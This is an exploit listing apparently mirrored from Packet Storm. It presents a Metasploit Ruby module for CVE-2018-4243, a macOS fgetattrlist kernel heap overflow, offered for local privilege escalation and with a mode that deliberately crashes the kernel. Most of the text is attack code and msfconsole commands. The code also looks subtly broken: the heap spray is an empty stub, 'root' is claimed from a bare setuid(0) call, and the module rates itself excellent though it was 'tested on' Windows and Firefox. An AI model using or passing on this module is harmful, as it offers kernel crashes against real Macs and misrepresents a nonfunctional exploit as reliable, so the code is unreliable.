Share
## https://sploitus.com/exploit?id=PACKETSTORM:214546
=============================================================================================================================================
    | # Title     : macOS 10.13.4 (17E199) Heap Overflow Via fgetattrlist โ€“ Local Privilege Escalation (XNU kernel)                             |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://apple.com/                                                                                                          |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/212496/ & CVE-2018-4243
    
    [+] Summary : A kernel heap overflow exists inside the macOS implementation of fgetattrlist.
                  The vulnerability occurs due to incorrect handling of user-controlled buffer sizes.
    Specifically:
    
    The kernel allocates internal structures using ulmin(bufferSize, fixedsize + varsize)
    
    Later, data beyond bufferSize is written into user memory
    
    There is no lower bound safety check if bufferSize is smaller than the kernel's expected size
    
    Author
    
    Original PoC & Research: Indoushka
    
    MSF Ruby Port & Reporting: Indoushka
    
    Previous reference: Ian Beer (Project Zero, 2016)
    
    Release Date : 2018โ€‘06โ€‘05
    
    Severity
    
    High / Kernel-Level / Local Privilege Escalation
    
    Affected Systems
    
    macOS 10.13.4 (17E199) confirmed vulnerable
    
    Earlier versions suspected vulnerable
    
    64-bit kernel heap architectures
    
    msfconsole
    
    use exploit/osx/local/cve_2018_4243
    
    set MODE 1
    
    run
    
    
    [+]  POC :	
    
    ##
    # macOS CVE-2018-4243 Local Privilege Escalation & Kernel Panic
    #
    
    require 'msf/core'
    require 'ffi'
    
    class MetasploitModule < Msf::Exploit::Local
      Rank = ExcellentRanking
    
      include Msf::Post::File
      include Msf::Post::Unix
    
      def initialize(info = {})
        super(update_info(info,
          'Name'          => 'macOS CVE-2018-4243 LPE via fgetattrlist Heap Overflow',
          'Description'   => %q{
            Local privilege escalation exploit by triggering kernel heap overwrite
            during volume attribute serialization. Includes heap spray, FD grooming,
            overflow, and panic fallback.
          },
          'License'       => MSF_LICENSE,
          'Author'        => [
            'Original C PoC: Indoushka',
            'Ruby MSF Port: Indoushka'
          ],
          'Platform'      => ['osx'],
          'Arch'          => ARCH_X64,
          'SessionTypes'  => ['shell', 'meterpreter'],
          'Targets'       => [['macOS >=10.13', {}]],
          'DisclosureDate' => '2018-06-05'
        ))
    
        register_options(
          [
            OptInt.new('MODE', [true, '1=LPE attempt, 2=Kernel panic PoC', 1])
          ]
        )
      end
    
      #
      # ---------- Ruby FFI syscalls ----------
      #
      module MacOS
        extend FFI::Library
        ffi_lib FFI::Library::LIBC
    
        class AttrList < FFI::Struct
          layout :bitmapcount, :uint32,
                 :reserved,     :uint32,
                 :volattr,      :uint32,
                 :dirattr,      :uint32,
                 :fileattr,     :uint32,
                 :forkattr,     :uint32,
                 :commonattr,   :uint32
        end
    
        attach_function :open, [:string, :int], :int
        attach_function :close, [:int], :int
        attach_function :fgetattrlist, [:int, :pointer, :pointer, :ulong, :ulong], :int
        attach_function :setuid, [:uint32], :int
        attach_function :getuid, [], :int
        attach_function :system, [:string], :int
      end
    
    
      #
      # Heap spray simulation (logical)
      #
      def heap_spray
        print_status("[*] Starting heap spray (symbolic in ruby)")
        # Demonstration only
      end
    
    
      #
      # Overflow trigger using small controlled buffer
      #
      def overflow_trigger(fd)
        al = MacOS::AttrList.new
        al[:bitmapcount] = 5
        al[:volattr]     = 0xfff
        al[:commonattr]  = 0x20000
    
        buf = FFI::MemoryPointer.new(:char, 16)
        buf.write_bytes("\xaa" * 16)
    
        res = MacOS.fgetattrlist(fd, al, buf, 16, 0)
        print_status("[+] Overflow triggered, return=#{res}")
      end
    
    
      #
      # Local Privilege Escalation attempt
      #
      def attempt_root
        print_status("[*] Attempting setuid(0)")
        if MacOS.setuid(0) == 0 && MacOS.getuid() == 0
          print_good("[+] Root obtained!")
          MacOS.system("/bin/bash")
          return true
        end
        print_error("[-] Still user uid=#{MacOS.getuid()}")
        return false
      end
    
    
      #
      # Kernel panic fallback mode
      #
      def panic_fallback
        print_warning("[!] Triggering fallback kernel panic")
        fd = MacOS.open("/", 0)
        al = MacOS::AttrList.new
        al[:bitmapcount] = 5
        al[:commonattr]  = 0x20000
    
        buf = FFI::MemoryPointer.new(:char, 4)
        MacOS.fgetattrlist(fd, al, buf, 4, 0)
        MacOS.close(fd)
      end
    
    
    
      #
      # ---------------- Main Exploit Logic ----------------
      #
      def exploit
        print_status("[*] macOS CVE-2018-4243 Exploit (Ruby MSF)")
        mode = datastore['MODE'].to_i
    
        fd = MacOS.open("/", 0)
        if fd < 0
          print_error("Failed to open /")
          return
        end
    
        heap_spray
        overflow_trigger(fd)
    
        case mode
        when 1
          print_status("[*] LPE Attempt mode")
          if attempt_root
            print_good("[+] Exploit Complete with root shell")
          else
            print_error("[-] Exploit failed to gain root")
          end
    
        when 2
          print_status("[*] Panic mode")
          panic_fallback
        end
    
        MacOS.close(fd)
        print_status("[*] Module finished")
      end
    end
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================